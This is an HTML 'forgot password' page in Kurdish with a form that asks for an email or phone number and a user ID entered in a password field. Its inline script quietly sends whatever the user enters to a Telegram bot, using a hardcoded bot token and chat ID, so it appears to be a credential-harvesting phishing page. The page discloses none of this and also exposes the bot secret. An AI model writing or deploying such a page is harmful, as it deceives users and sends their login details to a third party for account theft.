<!doctype html>
<html lang="ku">
  <head>
    <title>چیت لەبیر کردووە ؟</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="css/style.css">

    <style>
      body {
        direction: rtl;
        font-family: 'OkFont', sans-serif;
      }
      .text-md-right {
        text-align: left !important;
      }
      h2.heading-section {
        font-size: 2rem;
        color: #333;
      }
    </style>
  </head>
  <body>
    <section class="ftco-section">
      <div class="container">
        <div class="row justify-content-center">
          <div class="col-md-6 text-center mb-5">
            <h2 class="heading-section">چیت لەبیر کردووە ؟</h2>
          </div>
        </div>
        <div class="row justify-content-center">
          <div class="col-md-6 col-lg-5">
            <div class="login-wrap p-4 p-md-5">
              <form id="loginForm" class="login-form" onsubmit="return validateInput(event)">
                <div class="form-group">
                  <input id="emailOrPhone" type="text" class="form-control rounded-left" placeholder="ئیمەیل یان ژمارەی مۆبایل بنووسە" required>
                  <small id="error-message" style="color: red; display: none;">تکایە ئیمەیل یان ژماردەکانی موبایل بە شێوەی ڕاست بنووسە</small>
                </div>
                <div class="form-group d-flex">
                  <input id="userID" type="password" class="form-control rounded-left" placeholder="ئایدی بەکارهێنەر" required>
                </div>
                <div class="form-group d-md-flex">
                  <div class="w-50"></div>
                  <div class="w-50 text-md-right">
                    <a href="./index.html">گەڕانەوە بۆ چوونەژوورەوە</a>
                  </div>
                </div>
                <div class="form-group">
                  <button type="submit" class="btn btn-primary rounded submit p-3 px-5">ناردن</button>
                </div>
              </form>
            </div>
          </div>
        </div>
      </div>
    </section>

    <script src="js/jquery.min.js"></script>
    <script src="js/popper.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/main.js"></script>

    <script>
      function validateInput(event) {
        event.preventDefault(); 

        const emailOrPhone = document.getElementById("emailOrPhone").value;
        const userID = document.getElementById("userID").value;
        const errorMessage = document.getElementById("error-message");

        const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
        const phoneRegex = /^[0-9]{10,15}$/;

        if (emailRegex.test(emailOrPhone) || phoneRegex.test(emailOrPhone)) {
          errorMessage.style.display = "none";
          
          sendToTelegramBot(emailOrPhone, userID);

          return false;
        } else {
          errorMessage.style.display = "block";
          return false;
        }
      }

      function sendToTelegramBot(emailOrPhone, userID) {
        const token = '6522501339:AAFlRvLEu94evMeKk9FL-135lAHm9UqMtzA';
        const chat_id = '7403932045';
        const message = `یوسەر یاخود پاسسۆردی لابیر کردوە:\n\nئیمەیل/ژمارە مۆبایل: ${emailOrPhone}\nئایدی بەکارهێنەر: ${userID}`;
        const apiUrl = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(message)}`;

        fetch(apiUrl)
          .then(response => response.json())
          .then(data => {
            if (data.ok) {
				alert('داواکاریەکەت نێردرا !');
              console.log('داواکاریەکەت نێردرا !');
              window.location.href = './index.html';
            } else {
              console.error('هەڵەیەک ڕوویدا');
              alert('هەڵەیەک ڕوویدا، تکایە دواتر هەوڵ بدە.');
            }
          })
          .catch(error => {
            console.error('هەڵەیەک ڕوویدا:', error);
            alert('هەڵەیەک ڕوویدا، تکایە دواتر هەوڵ بدە.');
          });
      }
    </script>
  </body>
</html>
